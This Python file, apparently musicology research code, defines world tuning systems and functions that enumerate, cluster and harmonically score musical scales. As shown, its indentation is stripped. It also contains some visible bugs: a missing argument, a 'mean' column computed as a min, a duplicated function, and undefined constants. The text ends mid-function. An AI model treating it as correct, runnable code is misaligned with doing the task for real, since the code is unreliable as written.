EQ5_INTS = np.linspace(0, 1200, num=6, endpoint=True, dtype=float)
EQ7_INTS = np.linspace(0, 1200, num=8, endpoint=True, dtype=float)
EQ9_INTS = np.linspace(0, 1200, num=10, endpoint=True, dtype=float)
EQ10_INTS = np.linspace(0, 1200, num=11, endpoint=True, dtype=float)
EQ12_INTS = np.linspace(0, 1200, num=13, endpoint=True, dtype=float)
EQ24_INTS = np.linspace(0, 1200, num=25, endpoint=True, dtype=float)
EQ53_INTS = np.linspace(0, 1200, num=54, endpoint=True, dtype=float)
JI_INTS = np.array([0., 111.7, 203.9, 315.6, 386.3, 498.1, 590.2, 702., 813.7, 884.4, 1017.6, 1088.3, 1200.])
SLENDRO = np.array([263., 223., 253., 236., 225.])
PELOG = np.array([167., 245., 125., 146., 252., 165., 100.])
DASTGAH = np.array([0., 90., 133.23, 204., 294.14, 337.14, 407.82, 498., 568.72, 631.28, 702., 792.18, 835.2, 906., 996., 1039.1, 1109.77, 1200.])
TURKISH = {'T':203.8, 'K':181.1, 'S':113.2, 'B':90.6, 'F':22.6, 'A':271, 'E':67.9}
KHMER_1 = np.array([185., 195., 105., 195., 195., 185., 140.])
KHMER_2 = np.array([190., 190., 130., 190., 190., 190., 120.])
VIET = np.array([0., 175., 200., 300., 338., 375., 500., 520., 700., 869., 900., 1000., 1020., 1200.])
CHINA = np.array([0., 113.67291609, 203.91000173, 317.73848174, 407.83554758, 520.68758457, 611.71791523, 701.95500087, 815.62791696, 905.8650026 , 1019.47514332, 1109.76982292, 1201.27828039])
### Maximum allowable deviation from a perfect octave
### i.e., scale is included if the intervals sum to 1200 +- OCT_CUT
OCT_CUT = 50
def calculate_distance_between_windows(x, w):
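    # Group the ';'-separated integers in x into windows whose members lie
    # within w of the window's first element, then return the gaps between
    # consecutive windows as a ';'-separated string ('' if only one window).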
ints = sorted([int(y) for y in x.split(';')])
windows = [[ints[0]]]
for i in ints[1:]:
if i - windows[-1][0] < w:
windows[-1].append(i)
else:
windows.append([i])
if len(windows) == 1:
return ''
else:
dist = [windows[i+1][0] - windows[i][-1] for i in range(len(windows)-1)]
return ';'.join([str(d) for d in dist])
def get_distance_between_windows(df, w, X='pair_ints'):
df[f"d_w{w}"] = df.loc[:,X].swifter.apply(lambda x: calculate_distance_between_windows(x))
df[f"d_w{w}_min"] = df.loc[:,X].swifter.apply(lambda x: min([int(y) for y in x.split(';')]))
df[f"d_w{w}_mean"] = df.loc[:,X].swifter.apply(lambda x: min([int(y) for y in x.split(';')]))
return df
def calc_relative_entropy(pk, qk):
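    # Relative entropy (KL divergence, base 2) between distributions pk and qk,
    # skipping bins where either probability is non-positive.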
RE = 0.0
for i in range(len(pk)):
if pk[i] <= 0 or qk[i] <= 0:
continue
else:
RE += pk[i] * np.log2(pk[i] / qk[i])
return RE
def convert_grid(grid, y, num=1201):
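    # Linearly interpolate (grid, y) onto a uniform grid of `num` points
    # spanning 0-1200 cents; points outside the input range stay zero.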
new_grid = np.linspace(0, 1200, num=num)
new_y = np.zeros(num, dtype=float)
if grid[0] < 0:
start_point = 0
else:
start_point = np.where(new_grid - grid[0] > 0)[0][0]
if grid[-1] > 1200:
end_point = num
else:
end_point = np.where(new_grid - grid[-1] > 0)[0][0]
for i in range(start_point, end_point):
idx = np.where(grid - new_grid[i] > 0)[0][0]
new_y[i] = y[idx-1] + (new_grid[i] - grid[idx-1]) * (y[idx] - y[idx-1]) / (grid[idx] - grid[idx-1])
return new_grid, new_y
def smooth_dist_kde(df):
X = [float(x) for y in df.pair_ints for x in y.split(';')]
kde = smnp.KDEUnivariate(np.array(X))
kde.fit('gau', 'scott', 1, gridsize=10000, cut=20)
grid, y = kde.support, kde.density
return grid, y
def separate_clusters(pos, w, n_clu):
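    # Split an over-wide cluster: scan positions in ascending order and start
    # a new cluster label whenever the distance from the running offset
    # exceeds the window width w.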
idx_sort = np.argsort(pos)
cum_diff = [p - pos.min() for p in pos[idx_sort]]
new_clu = []
offset = 0
for cd in cum_diff:
if (cd - offset) > w:
n_clu += 1
offset += cd
new_clu.append(n_clu)
pos[idx_sort] = new_clu
return pos
def get_clusters(df, w=20, cat='pair_ints'):
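    # Count interval clusters per scale: run DBSCAN (eps=w) on the 1-D
    # interval sizes, splitting any cluster wider than w via separate_clusters.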
clusters = []
for pi in [ [int(x) for x in y.split(';')] for y in df.loc[:,cat]]:
pi_inp = np.array([pi, [0]*len(pi)]).T
cluster = DBSCAN(eps=w, min_samples=1).fit(pi_inp)
clu_idx = cluster.labels_
clu_set = set(clu_idx)
for clu_id in sorted(list(clu_set)):
clu_pos = pi_inp[clu_idx==clu_id,0]
clu_range = clu_pos.max() - clu_pos.min()
if clu_range > w:
new_clu = separate_clusters(clu_pos, w, len(clu_set))
clu_idx[clu_idx==clu_id] = new_clu
[clu_set.add(x) for x in new_clu]
clusters.append(len(set(clu_idx)))
return clusters
def get_ratio_from_cents(cents):
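    # An interval of `cents` corresponds to a frequency ratio of 2**(cents/1200)
    # (inverse of get_cents_from_ratio below).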
return 2 ** (cents / 1200.)
def get_cents_from_ratio(ratio):
return 1200.*np.log10(ratio)/np.log10(2)
def sum_to_n(n, size, limit=None, nMin=1):
"""Produce all lists of `size` positive integers in decreasing order
that add up to `n`."""
if size == 1:
yield [n]
return
if limit is None:
limit = n
start = (n + size - 1) // size
stop = min(limit, n - size + 1) + 1
for i in range(start, stop):
for tail in sum_to_n(n - i, max(size - 1, nMin), i, nMin=nMin):
yield [i] + tail
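# Example: list(sum_to_n(6, 3)) -> [[2, 2, 2], [3, 2, 1], [4, 1, 1]]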
def get_all_possible_scales_12_tet(df):
codes = set(df.code.unique())
for i in range(4,13):
for partition in sum_to_n(12, i, limit=4):
ints = [len(np.where(np.array(partition)==j)[0]) for j in range(1,5)]
code = ''.join([str(x) for x in ints])
if code not in codes:
codes.add(code)
df.loc[len(df), ['1','2','3','4','notes_in_scale','code']] = ints + [i] + [code]
return df
def get_all_possible_scales_general(nI=240, iLimit=80, nSmin=4, nSmax=9, nMin=1):
df = pd.DataFrame(columns=['n_notes', 'interval'])
last_len = 0
for i in range(nSmin, nSmax+1):
timeS = time.time()
print(i)
for partition in sum_to_n(nI, i, limit=iLimit, nMin=nMin):
ints = [float(x)*(1200./float(nI)) for x in partition]
code = ';'.join([str(x) for x in ints])
df.loc[len(df), ['n_notes','interval']] = [i] + [code]
print(len(df) - last_len, ' scales found after ...')
last_len = len(df)
print((time.time()-timeS)/60., ' minutes')
return df
def check_for_allowed_ratios(df):
def fn(x):
ints = [float(y) for y in x.split(';')]
ratios = [i / min(ints) for i in ints]
if sum([1 for r in ratios if r not in [1., 1.5, 2., 2.5, 3., 3.5, 4.]]):
# if sum([1 for r in ratios if r not in [1., 2., 3., 4.]]):
return False
else:
return True
df['allowed_ratios'] = df.interval.apply(lambda x: fn(x))
return df
def are_intervals_distinct(df, cent_tol=30.):
def fn(x):
ints = [float(y) for y in x.split(';')]
diffs = np.abs([ints[i] - ints[j] for i in range(len(ints)) for j in range(len(ints))])
return sum([1 for d in diffs if 0.0 < d < cent_tol])
df['distinct'] = df.interval.apply(lambda x: fn(x))
return df
def get_scale_energies_exact_ratios(df):
def fn(x):
ints = [float(y) for y in x.split(';')]
ratios = [i / min(ints) for i in ints]
return np.mean([1./(float(i)-0.5)**3 + np.exp(float(i)) for i in ratios])
df['energy'] = df.interval.apply(lambda x: fn(x))
return df
def get_scale_energies_real_ratios(df):
def fn(x):
ratios = [float(y) for y in x.split(';')]
# ratio_term = np.mean([1./(y-0.5)**3 + np.exp(y) for y in ratios])
ratio_term = np.mean([1./(y/40.) + np.exp(y)*2.0 for y in ratios])
microtuning = BETA * np.mean([(round(y) - y)**2 * float(round(y)) for y in ratios])
return ratio_term + microtuning
df['energy'] = df.ratios.apply(lambda x: fn(x))
return df
def get_ratios_from_ints(df):
def fn(x):
ratios = [float(y) for y in x.split(';')]
base_ints = np.arange(25., min(ratios)*1.2, 5.)
min_energy = 10.e10
max_base = 1.
for i, base in enumerate(base_ints):
energy = calculate_energy_harmonic(ratios, base)
if energy <= min_energy:
min_energy = energy
max_base = base
return ';'.join([str(round(y / max_base, 2)) for y in ratios ])
df['ratios'] = df.interval.apply(lambda x: fn(x))
return df
def get_min_energy_integer_ratios(pair_ints):
ratios = []
base_o = []
base_ints = np.arange(35., 155., 5.)
for pi in pair_ints:
energy = np.zeros(base_ints.size, dtype=float)
for i, base in enumerate(base_ints):
energy[i] = calculate_energy(pi, base)
ratios.append([x / base_ints[np.argmin(energy)] for x in pi ])
base_o.append(base_ints[np.argmin(energy)])
print(base_ints[np.argmin(energy)], pi)
print(energy)
return ratios, base_o
def plot_real_vs_derived_ints(df, pair_ints, iMin=100., n=7, weights=[]):
fig, ax1 = plt.subplots(2,1)
idx = [i for i in range(len(pair_ints)) if len(pair_ints[i])==n]
b = [[float(y) for y in x.split(';')] for x in df.loc[(df.min_int.apply(lambda x: x>=iMin))&(df.n_notes==n)&(df.allowed_ratios), 'interval']]
sns.distplot([float(y) for x in df.loc[(df.allowed_ratios)&(df.n_notes==n)&(df.min_int.apply(lambda x: x>=iMin)), 'interval'] for y in x.split(';')], bins=100, ax=ax1[0], label='derived')
sns.distplot([c/min(a) for a in b for c in a], bins=100, ax=ax1[1], label='derived')
if len(weights):
w1 = [weights[i] for i in idx for y in range(len(pair_ints[i]))]
sns.distplot([y for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[0], label='real', hist_kws={'weights':w1})
sns.distplot([y/min(x) for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[1], label='real', hist_kws={'weights':w1})
else:
sns.distplot([y for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[0], label='real')
sns.distplot([y/min(x) for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[1], label='real')
ax1[0].legend(loc='best')
ax1[1].legend(loc='best')
plt.show()
def plot_real_vs_derived_ints_energy_cutoff(df, pair_ints, eCut=1000., iMin=100., n=7, weights=[]):
fig, ax1 = plt.subplots(2,1)
idx = [i for i in range(len(pair_ints)) if len(pair_ints[i])==n]
idx2 = df.loc[(df.energy<eCut)&(df.min_int>=iMin)&(df.n_notes==n)].index
# idx2 = df.loc[(df.energy<eCut)&(df.min_int>=iMin)].index
# idx = range(len(pair_ints))
b = [[float(y) for y in x.split(';')] for x in df.loc[idx2, 'interval']]
sns.distplot([float(y) for x in df.loc[idx2, 'interval'] for y in x.split(';')], bins=100, ax=ax1[0], label='derived')
sns.distplot([c/min(a) for a in b for c in a], bins=100, ax=ax1[1], label='derived')
if len(weights):
w1 = [weights[i] for i in idx for y in range(len(pair_ints[i]))]
sns.distplot([y for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[0], label='real', hist_kws={'weights':w1})
sns.distplot([y/min(x) for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[1], label='real', hist_kws={'weights':w1})
else:
sns.distplot([y for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[0], label='real')
sns.distplot([y/min(x) for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[1], label='real')
ax1[0].legend(loc='best')
ax1[1].legend(loc='best')
plt.show()
def plot_all_scales_ints_ratios(df):
n_notes = df.n_notes.unique()
fig, ax = plt.subplots(6,2)
for i, n in enumerate(n_notes):
ints = [[float(x) for x in y.split(';')] for y in df.loc[df.n_notes==n,'interval']]
sns.distplot([x for y in ints for x in y], bins=100, ax=ax[i,0], label=str(n))
sns.distplot([y / min(x) for x in ints for y in x], bins=100, ax=ax[i,1], label=str(n))
ax[i,0].legend(loc='best')
ax[i,1].legend(loc='best')
plt.show()
def get_attractors(dI=5.):
sc_i = np.arange(dI, 1200.+dI, dI)
sc_f = set()
attract = []
ratios = []
simils = []
for s in sc_i:
max_similarity, best_ratio, cents = calculate_most_harmonic_neighbour(s)
if max_similarity == 0.0:
continue
if round(cents,2) not in sc_f:
sc_f.add(round(cents,2))
attract.append(round(cents,2))
ratios.append(best_ratio)
simils.append(max_similarity)
return sc_i, np.array(attract), ratios, simils
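# Typical usage (CENT_DIFF_MAX is assumed to be set at module level):
#   sc_i, attract, ratios, simils = get_attractors()
# attract[k] is the cents value of the most harmonic interval near grid
# point k, ratios[k] its integer ratio, and simils[k] its similarity score.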
def get_harmonic_similarity_score(pair_ints):
output = []
for x in pair_ints:
scores = []
        # iterate over every interval between any pair of notes (cumulative
        # sums of adjacent steps), skipping the unison
        for csum in [y for j in range(len(x)) for y in np.cumsum(x[j:])]:
            if csum == 0:
                continue
            sc, _, _ = calculate_most_harmonic_neighbour(csum)
            scores.append(sc)
output.append( np.mean(scores) )
return output
def get_similarity_of_nearest_attractor(x, sc_f, simil):
minIdx = np.argmin(np.abs(sc_f - x))
return simil[minIdx]
def get_nearest_attractor(x, sc_f, ratio):
minIdx = np.argmin(np.abs(sc_f - x))
return ':'.join([str(int(r)) for r in ratio[minIdx]])
def get_harmonic_similarity_score_df(df):
sc_i, sc_f, ratios, simil = get_attractors()
df['harm_sim'] = df.all_ints.apply(lambda x: np.mean([get_similarity_of_nearest_attractor(float(y), sc_f, simil) for y in x.split(';')]))
return df
def get_attractors_in_scale(df):
sc_i, sc_f, ratios, simil = get_attractors()
df['attractors'] = df.all_ints.apply(lambda x: ';'.join([str(get_nearest_attractor(float(y), sc_f, ratios)) for y in x.split(';')]))
return df
def get_weighted_harmonic_similarity_score(pair_ints):
output = []
for x in pair_ints:
scores = []
for i in range(len(x)):
for j, y in enumerate(np.cumsum(x[i:])):
if y == 0:
continue
sc, _, _ = calculate_most_harmonic_neighbour(y)
scores.append(sc)
if i == 0:
scores.append(sc)
output.append( np.mean(scores) )
return output
def get_harmonic_similarity_score_extra_notes(df):
def fn(x):
a = [int(y) for y in x*2]
return np.mean(INTERVAL_SCORE[[l-1 for i in range(len(x)) for l in list(np.cumsum(a[i:i+len(x)]))]])
df['score_en'] = df.str_fmt.apply(lambda x: fn(x))
return df
def calculate_most_harmonic_neighbour(int_cents, sim_only=False):
best_ratio = [1,1]
max_similarity = 0.0
cents = 0.0
for x in np.arange(1,75, dtype=float):
cent_diff = 1200.*np.log10((x+1.)/x)/np.log10(2.) - int_cents
if cent_diff > CENT_DIFF_MAX:
continue
for y in np.arange(x+1.,99., dtype=float):
cent_diff = abs(1200.*np.log10(y/x)/np.log10(2.)- int_cents)
if cent_diff > CENT_DIFF_MAX:
continue
simil = ((x+y-1.)/(x*y))*100.
if simil > max_similarity:
cents = 1200.*np.log10(y/x)/np.log10(2.)
best_ratio = [y,x]
max_similarity = simil
if sim_only:
return max_similarity
else:
return max_similarity, best_ratio, cents
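# Worked example (with the usual CENT_DIFF_MAX = 22): for int_cents = 700
# the search settles on y/x = 3/2 (701.955 cents), whose similarity is
# (3 + 2 - 1)/(3*2) * 100 = 66.7.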
def get_most_harmonic_ratios_equal_temp():
    # 100-1200 cents in equal-tempered semitone steps
    real_num = [2.**(x/1200.) for x in np.arange(100, 1300, 100, dtype=float)]
    harmonic_similarity = []
    for num in real_num:
        int_cents = 1200.*np.log10(num)/np.log10(2.)
        max_similarity, best_ratio, cents = calculate_most_harmonic_neighbour(int_cents)
        harmonic_similarity.append(max_similarity)
    return np.array(harmonic_similarity)
# Takes as input the scale given in cents from 0 to 1200
def get_similarity_rating_any_scale(scale_cents):
all_ints = [scale_cents[j] - scale_cents[i] for i in range(len(scale_cents)) for j in range(i+1, len(scale_cents))]
real_num = [2.**(x/1200.) for x in all_ints]
harmonic_similarity = []
for i, num in enumerate(real_num):
int_cents = 1200.*np.log10(num)/np.log10(2.)
max_similarity, best_ratio, cents = calculate_most_harmonic_neighbour(int_cents)
harmonic_similarity.append(max_similarity)
return np.array(harmonic_similarity)
def get_harmonic_similarity_score_equal_temp(df):
INTERVAL_SCORE = get_most_harmonic_ratios_equal_temp()
def fn(x):
a = [int(y) for y in x]
return np.mean(INTERVAL_SCORE[[l-1 for i in range(len(a)) for l in list(np.cumsum(a[i:]))]])
df['score_eq'] = df.str_fmt.apply(lambda x: fn(x))
return df
def get_harmonic_similarity_score_equal_temp_extra_notes(df):
INTERVAL_SCORE = get_most_harmonic_ratios_equal_temp()
def fn(x):
a = [int(y) for y in x*2]
return np.mean(INTERVAL_SCORE[[l-1 for i in range(len(x)) for l in list(np.cumsum(a[i:i+len(x)]))]])
df['score_eq_en'] = df.str_fmt.apply(lambda x: fn(x))
return df
def dataframe_possible_scales(df):
sc_df = pd.DataFrame(columns=['n_notes', 'code', 'str_fmt', 'family'])
for row in df.itertuples():
for fams in row.families.split(';'):
sp = fams.split('-')
fam = int(sp[0])
for scale in sp[1].split(','):
sc_df.loc[len(sc_df)] = [row.notes_in_scale, row.code, scale, fam]
return sc_df
def plot_score_histograms(df):
fig, ax = plt.subplots(2,2, sharex=True, sharey=True)
ax = ax.reshape(4)
lbls = ['score' + s for s in ['', '_en', '_eq', '_eq_en']]
for i, a in enumerate(ax):
for n in df.n_notes.unique():
sns.distplot(df.loc[df.n_notes==n, lbls[i]], label=str(n), kde=True, ax=a)
a.legend(loc='best')
a.set_ylim(0,2)
plt.show()
def get_intervals_as_list(df, i):
ints = [int(x) for x in df.loc[i,['1','2','3','4']]]
return ''.join([ j for i in range(4) for j in ints[i]*str(i+1) ])
def get_translational_invariants(non_ident):
trans_inv = []
variants = set()
families = {}
for ni in non_ident:
if ni in variants:
continue
var_set = set(''.join(np.roll([x for x in ni],i)) for i in range(len(ni)) )
        variants.update(var_set)
trans_inv.append(ni)
families.update({ni:var_set})
return trans_inv, families
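# Example: the rotations of '221' are {'221', '212', '122'}, so those three
# interval strings collapse into one translationally-invariant family.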
def get_unique_scales(df):
for row in df.itertuples():
if np.isnan(row.possible_arrangements):
ll = get_intervals_as_list(df, row[0])
non_identical = [''.join(x) for x in set(permutations(ll))]
df.loc[row[0],'n_ni'] = len(non_identical)
trans_inv, families = get_translational_invariants(non_identical)
df.loc[row[0],'n_ti'] = len(trans_inv)
ti_str = ';'.join([str(i)+'-'+ trans_inv[i] for i in range(len(trans_inv))])
fam_str = ';'.join([str(i)+'-'+ ','.join(families[trans_inv[i]]) for i in range(len(trans_inv))])
df.loc[row[0],'trans_inv'] = ti_str
df.loc[row[0],'families'] = fam_str
df.loc[row[0],'possible_arrangements'] = ti_str
return df
def match_scale_with_instrument(scale):
in_mask = np.where(INST)[0]
sc_mask = np.array([int(x) for x in scale], dtype=bool)
notes_per_key = []
for key in range(12):
notes_per_key.append(sum([1 for x in np.where(sc_mask[key:])[0] if x in in_mask ]))
return ';'.join([str(x) for x in notes_per_key])
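# INST is assumed to be a module-level boolean mask of the chromatic
# positions playable on the instrument; the returned string gives, for each
# of the 12 keys, how many scale degrees land on playable positions.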
def count_those_over_75p(mix):
counts, n_max = mix.split('-')
return sum([1 for x in counts.split(';') if float(x) >= 0.75*(float(n_max)*2.+1.)])
def count_those_over_85p(mix):
counts, n_max = mix.split('-')
return sum([1 for x in counts.split(';') if float(x) >= 0.85*(float(n_max)*2.+1.)])
def new_score(mix):
counts, n_notes = mix.split('-')
n_max = int(n_notes) * 2 + 1
points = {n_max-i: max(5-i,0) for i in range(n_max)}
return sum([points[int(x)] for x in counts.split(';')])
def a_n_u(scale):
in_mask = np.where(INST)[0]
sc_mask = np.array([int(x) for x in scale], dtype=bool)
notes_in_scale = len(in_mask)
notes_per_key = []
for key in range(12):
notes_per_key.append(sum([1 for x in in_mask if x in np.where(sc_mask[key:])[0] ]))
return sum([ 1 for x in notes_per_key if x == notes_in_scale ])
def all_notes_used(df):
df['all_notes'] = df['mask'].apply(lambda x: a_n_u(x))
return df
def get_inst_var_score(df):
df['inst_keys'] = df['mask'].apply(lambda x: match_scale_with_instrument(x))
df['inst_score'] = df.inst_keys.apply(lambda x: sum([int(y) for y in x.split(';')]))
df['inst_norm'] = df.inst_score.astype(float) / (df.n_notes.astype(float) * 2. + 1.) / 12.
df['inst_std'] = df.inst_keys.apply(lambda x: np.std([float(y) for y in x.split(';')])) / (df.n_notes.astype(float) * 2. + 1.) / 12.
tmp_df = df.inst_keys + '-' + df.n_notes.astype(str)
df['inst_75p'] = tmp_df.apply(lambda x: count_those_over_75p(x))
df['inst_85p'] = tmp_df.apply(lambda x: count_those_over_85p(x))
df['inst_new_score'] = tmp_df.apply(lambda x: new_score(x))
return df
def df_cols_as_int(df):
cols = ['1','2','3','4','possible_arrangements','notes_in_scale','n_ni','n_ti']
df.loc[:, cols] = df.loc[:, cols].astype(int)
return df
def get_codes(df):
for row in df.itertuples():
df.loc[row[0],'code'] = ''.join([str(row[i]) for i in range(1,5)])
return df
def reformat_scales_as_mask(df):
st = '000000000000001'
fn = lambda x: '1' + ''.join([st[-int(i):] for i in x])
idx = df.loc[df.Tuning.apply(lambda x: x not in ['Unique', 'Turkish', '53-tet'])].index
df.loc[idx, 'mask'] = df.loc[idx, 'Intervals'].apply(fn)
fn = lambda x: '1' + ''.join([st[-int(i):] for i in x.split(';')])
idx = df.loc[df.Tuning=='53-tet'].index
df.loc[idx, 'mask'] = df.loc[idx, 'Intervals'].apply(fn)
return df
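# Example: a major scale entered as Intervals '2212221' becomes the
# 13-character chromatic mask '1010110101011' ('1' marks each scale degree).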
def extract_scales_and_ints_from_scales(df):
names = []
scales = []
all_ints = []
pair_ints = []
cultures = []
tunings = []
conts = []
ref = []
theory = []
for row in df.itertuples():
        try:
            idx = np.where(np.array([int(x) for x in row.mask]))[0]
        except (TypeError, ValueError):
            # unparseable mask (e.g. NaN): skip this row rather than
            # silently reusing idx from the previous row
            continue
for tun in row.Tuning.split(';'):
if tun == '12-tet':
scale = EQ12_INTS[idx]
elif tun == '53-tet':
scale = EQ53_INTS[idx]
elif tun == 'Just':
scale = JI_INTS[idx]
elif tun == 'Pythagorean':
scale = PYT_INTS[idx]
elif tun == 'Arabian':
scale = EQ24_INTS[idx]
elif tun == 'Dastgah-ha':
scale = DASTGAH[idx]
elif tun == 'Vietnamese':
scale = VIET[idx]
elif tun == 'Chinese':
scale = CHINA[idx]
elif tun == 'Turkish':
scale = np.cumsum([0.0] + [TURKISH[a] for a in row.Intervals])
elif tun == 'Khmer':
for KHM in [KHMER_1, KHMER_2]:
base = KHM[[i-1 for i in idx[1:]]]
for i in range(len(base)):
                        scale = np.cumsum([0.] + list(np.roll(KHM, i)))
names.append(row.Name)
scales.append(scale)
all_ints.append([scale[i] - scale[j] for j in range(len(scale)) for i in range(j+1,len(scale))])
pair_ints.append([scale[j+1] - scale[j] for j in range(len(scale)-1)])
cultures.append(row.Culture)
tunings.append(tun)
conts.append(row.Region)
ref.append(row.Reference)
theory.append(row.Theory)
continue
elif tun == 'Unique':
scale = np.cumsum([0.] + [float(x) for x in row.Intervals.split(';')])
else:
print(row.Name, tun, tun=='12-tet')
continue
names.append(row.Name)
scales.append(scale)
all_ints.append([scale[i] - scale[j] for j in range(len(scale)) for i in range(j+1,len(scale))])
pair_ints.append([scale[j+1] - scale[j] for j in range(len(scale)-1)])
cultures.append(row.Culture)
tunings.append(tun)
conts.append(row.Region)
ref.append(row.Reference)
theory.append(row.Theory)
return cultures, tunings, conts, names, scales, all_ints, pair_ints, ref, theory
# This will not work in all instances!!!
# A proper clustering algorithm is needed
def get_dist_order(pair_ints):
order = []
for ints in pair_ints:
uniq = np.array(list(set(ints)))
idx = [sum([1 for j in range(i+1, len(uniq)) if abs(uniq[i] - uniq[j]) < 45.]) for i in range(len(uniq))]
order.append(np.where(np.array(idx)==0)[0].size)
return order
def reformat_real_scales_as_strings(df):
for row in df.itertuples():
df.loc[row[0],'str_fmt'] = ''.join([str(row[i]) for i in range(1,13) if row[i]])
return df
def match_scale_with_family(df, rs):
for code in rs.code.unique():
dfIdx = df.loc[df.code==code].index[0]
fam_dict = {}
fams = [{z:x.split('-')[0] for z in x.split('-')[1].split(',')} for x in df.loc[dfIdx,'families'].split(';')]
for f in fams:
fam_dict.update(f)
associated_scales = []
for row in rs.loc[rs.code==code].itertuples():
famIdx = fam_dict[row.str_fmt]
associated_scales.append(famIdx + '-' + row.Names)
if len(associated_scales):
df.loc[dfIdx, 'real_scales'] = ';'.join(associated_scales)
df.loc[dfIdx, 'n_rs'] = len(associated_scales)
return df
def get_2grams_dist(df, dI=10, imin=0, imax=620):
int_bins = np.arange(imin, imax+dI, dI)
nI = int_bins.size
dist = np.zeros((nI, nI), dtype=float)
for p_int in df.pair_ints:
pi = [int(x) for x in p_int.split(';')]
for i in range(len(pi)-1):
x = int(pi[i] / float(dI))
y = int(pi[i+1] / float(dI))
dist[x,y] += 1.0
return dist
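# dist[x, y] counts how often a step interval in bin x is immediately
# followed by one in bin y, i.e. a bigram distribution over adjacent steps.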
def plot_2gram_dist_by_n_notes(df, dI=10):
fig, ax = plt.subplots(2,3)
ax = ax.reshape(ax.size)
for i, n in enumerate([4,5,6,7,8,9]):
dist = get_2grams_dist(df.loc[df.n_notes==n], dI=dI)
sns.heatmap(np.log(dist[::-1]+0.1), label=str(n), ax=ax[i])
ax[i].set_title(str(n))
plt.show()
def plot_pair_ints_by_n_notes(df):
fig, ax = plt.subplots(4,2)
ax = ax.reshape(ax.size)
n_notes = sorted(df['n_notes'].unique())
for i, t in enumerate(n_notes):
        cultures, tunings, conts, names, scales, all_ints, pair_ints, ref, theory = extract_scales_and_ints_from_scales(df.loc[df['n_notes']==t])
sns.distplot([y for x in pair_ints for y in x], bins=120, label=str(t), ax=ax[i])
ax[i].legend(loc='best')
sns.distplot([y for x in pair_ints for y in x], bins=120, label=str(t), ax=ax[-1])
plt.show()
def plot_pair_ints_by_n_notes_one_graph(df):
fig, ax = plt.subplots()
n_notes = np.arange(4,10)
for i, t in enumerate(n_notes):
        cultures, tunings, conts, names, scales, all_ints, pair_ints, ref, theory = extract_scales_and_ints_from_scales(df.loc[df['n_notes']==t])
# sns.distplot([y for x in pair_ints for y in x], bins=120, label=str(t), ax=ax)
sns.kdeplot([y for x in pair_ints for y in x], label=str(t), ax=ax)
ax.legend(loc='best')
plt.show()
def plot_pair_ints_by_tuning(df):
fig, ax = plt.subplots(6,2)
ax = ax.reshape(12)
tunings = df.Tuning.unique()
for i, t in enumerate(tunings):
        cultures, tun_out, conts, names, scales, all_ints, pair_ints, ref, theory = extract_scales_and_ints_from_scales(df.loc[df['Tuning']==t])
sns.distplot([y for x in pair_ints for y in x], bins=120, label=t, ax=ax[i])
ax[i].legend(loc='best')
plt.show()
def plot_order_vs_n_notes_distplot(order, pair_ints):
len_scales = [len(x) for x in pair_ints]
n_notes = np.unique(len_scales)
fig, ax = plt.subplots(2,1)
order = np.array(order)
for i in range(len(n_notes)):
idx = np.where(len_scales==n_notes[i])[0]
sns.distplot(order[idx], ax=ax[0], label=str(n_notes[i]))
sns.kdeplot(order[idx], ax=ax[1], label=str(n_notes[i]))
ax[0].legend(loc='best')
ax[1].legend(loc='best')
plt.show()
def plot_order_vs_n_notes_heatmap(order, pair_ints):
len_scales = [len(x) for x in pair_ints]
x1 = np.unique(order)
y1 = np.unique(len_scales)
z1 = np.zeros((x1.size, y1.size))
for i in range(len(order)):
x = np.where(x1==order[i])[0]
y = np.where(y1==len_scales[i])[0]
z1[x,y] = z1[x,y] + 1.0
fig, ax = plt.subplots()
sns.heatmap(np.log10(z1+1), ax=ax, cmap='Greys')
ax.set_xticklabels(y1)
ax.set_yticklabels(x1)
plt.show()
def plot_score_by_cat(df, cat='Tuning', score='s1'):
uni = df.loc[:,cat].unique()
if uni.size <=12:
fig, ax = plt.subplots(4,3)
elif uni.size <=24:
fig, ax = plt.subplots(6,4)
ax = ax.reshape(ax.size)
for i, u in enumerate(uni):
if df.loc[(df.loc[:,cat]==u)&(df.loc[:,score].notnull()), score].size ==0:
sns.distplot(df.loc[(df.loc[:,score].notnull()), score], ax=ax[i], bins=100, label='all')
continue
sns.distplot(df.loc[(df.loc[:,cat]==u)&(df.loc[:,score].notnull()), score], ax=ax[i], bins=100, label=u)
ax[i].legend(loc='best')
plt.show()
def calculate_energy_harmonic(ints, base):
return np.mean([(round(i/base) - i/base)**2 for i in ints])
def calculate_energy(ints, base):
return np.mean([(round(i/base) - i/base)**2 * float(round(i/base)) for i in ints])
def get_min_energy_integer_ratios(pair_ints):
ratios = []
base_o = []
base_ints = np.arange(35., 155., 5.)
for pi in pair_ints:
energy = np.zeros(base_ints.size, dtype=float)
for i, base in enumerate(base_ints):
energy[i] = calculate_energy(pi, base)
ratios.append([x / base_ints[np.argmin(energy)] for x in pi ])
base_o.append(base_ints[np.argmin(energy)])
print(base_ints[np.argmin(energy)], pi)
print(energy)
return ratios, base_o
def reformat_surjodiningrat(df):
for row in df.itertuples():
ints = [get_cents_from_ratio(float(row[i+3])/float(row[i+2])) for i in range(7) if row[i+3] != 0]
df.loc[row[0], 'pair_ints'] = ';'.join([str(int(round(x))) for x in ints])
df['Reference'] = 'Surjodiningrat'
df['Theory'] = 'N'
df = df.drop(columns=[str(x) for x in range(1,9)])
return df
def reformat_original_csv_data(df):
new_df = pd.DataFrame(columns=['Name', 'Intervals', 'Culture', 'Region', 'Tuning', 'Reference', 'Theory'])
for i, col in enumerate(df.columns):
tuning = df.loc[0, col]
culture = df.loc[1, col]
cont = df.loc[2, col]
ref = df.loc[3, col]
theory = df.loc[4, col]
try:
int(col)
name = '_'.join([culture, col])
except:
name = col
ints = ';'.join([str(int(round(float(x)))) for x in df.loc[5:, col] if not str(x)=='nan'])
new_df.loc[i] = [name, ints, culture, cont, tuning, ref, theory]
return new_df
def extract_scales_and_ints_from_unique(df):
names = []
scales = []
all_ints = []
pair_ints = []
cultures = []
tunings = []
conts = []
ref = []
theory = []
for row in df.itertuples():
ints = [int(x) for x in row.Intervals.split(';')]
if sum(ints) < (1200 - OCT_CUT):
continue
start_from = 0
for i in range(len(ints)):
if i < start_from:
continue
